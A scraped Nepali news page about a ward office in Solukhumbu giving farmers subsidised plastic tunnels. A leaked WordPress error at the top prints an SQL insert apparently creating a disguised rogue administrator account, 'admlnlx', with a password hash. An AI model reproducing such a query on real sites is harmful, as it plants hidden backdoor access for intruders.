WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC0BOPUUJe8XgUSReoq3BF4JuB77Jd0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 19:09:30', '', 'admlnlx', 'admlnlx')

देउसामा कृषकलाई प्लाष्टिक टनेला बितरण – Gaule Khabar

देउसामा कृषकलाई प्लाष्टिक टनेला बितरण

देउसामा कृषकलाई प्लाष्टिक टनेला बितरण

सोलुखुम्बु । थुलुङ दुधकोशी गाउँपालिका-७ देउसाले प्लाष्टिक टनेला वितरण गरेको छ । वडा कार्यालयमा दर्ता गरेका कृषक तथा कृषि समुहलाई मागको आधारमा उक्त टनेला वितरण गरिएको वडा अध्यक्ष भोजराज कार्कीले जानकारी दिए ।

कार्कीका अनुसार वडा कार्यालयको पचास प्रतिशत अनुदानमा ६० थान प्लाष्टिक टनेल वितरण गरिएको छ ।कृषिमा आत्मानिर्भर बनाउनको लागि बीउ बिजन देखि प्रविधि लगायतमा वडाले बजेट व्यवस्था गरि काम गरिरहेको भन्दै वडा अध्यक्ष भोजराज कार्कीले आर्थिक र सामाजिक विकास महत्वपुर्ण रहेको बताए । भौतिक विकास संगै सामाजिक तथा आर्थिक विकासलाई एकैसाथ लान नसक्दा देशमा गरिबी न्यूनीकरण नभएको हुँदा युवाहरु विदेशीनु परेको उहाँको भनाई छ ।

कृषि कार्य भइरहेको भएपनि व्यवसायिक नहुँदा समस्या रहेकाले व्यवसायिक खेति प्रणालिको विकासमा जोड दिइएको उहाँको भनाई छ । राज्यबाट वितरण हुने अनुदानमा पहुँचवालाले मात्रै लाभ लिने गरेको भन्दै वडा अध्यक्ष कार्कीले वास्तविक कृषकलाई अनुदानको पहुँचमा पुर्‍याउने प्रयास भइरहेको बताए । एकै क्षेत्रका नागरिकले थोरै थोरै उत्पादन गरेपनि धेरै हुने र बजार पाउने वडा अध्यक्ष कार्कीको विश्वास छ ।

प्लाष्टिक टनेला वितरण कार्यक्रममा वडा सदस्य तथा कार्यापालिका सदस्य सरिता राई, लिलामान तामाङ र रोशन राई लगायतको उपस्थिति रहेको थियो । अब तत्काल कृषि प्राविधिकलाई खटाएर जग्गा छनौट गरि एक महिना भित्र निर्माण गरिसक्ने र बीउ बीजन प्रदान गरिने वडा सदस्य सरिता राईले बताउँनुभयो । बेमौसमी तरकारी उत्पादन हुँदा यहाँका कृषकको आम्दानीमा वृद्धि उहाँको भनाई छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका